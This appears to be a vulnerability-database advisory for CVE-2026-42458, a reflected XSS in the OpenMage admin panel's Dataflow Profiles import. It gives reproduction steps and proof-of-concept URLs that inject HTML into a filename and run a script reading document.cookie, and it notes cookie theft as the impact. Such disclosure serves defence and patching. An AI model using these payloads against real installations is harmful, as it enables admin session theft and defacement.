Deploy autonomous AI agents that reason, exploit, and validate complex vulnerability chains — not another scanner, an agentic system that thinks like a senior pentester.
CVE-2026-42458 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
A reflected XSS vulnerability was found under admin panel -> System -> Import/Export -> Dataflow - Profiles.
Login to the admin panel
Go to the path System -> Import/Export -> Dataflow - Profiles
Select profile direction as Import.
Click on Import Customers
Upload the file.
File Link: customer_20260212_204335.csv
Go back to Run profile.
Select the uploaded file and Click on Run in Popup.
One can see a URL like this
https://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/import-20260215151125-1_customer_20260212_204335.csv/
One can see the filename getting reflection in HTML tags.
Inject an HTML tag and observe.
https://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/"><h3>hacked</h3>/
One can see the tag is getting executed.
Proceed for XSS.
https://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/%3CScRiPt%20%3Eprompt(document.cookie)%3C%2FScRiPt%3E
Cookie stealing, JS deface, many more
Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.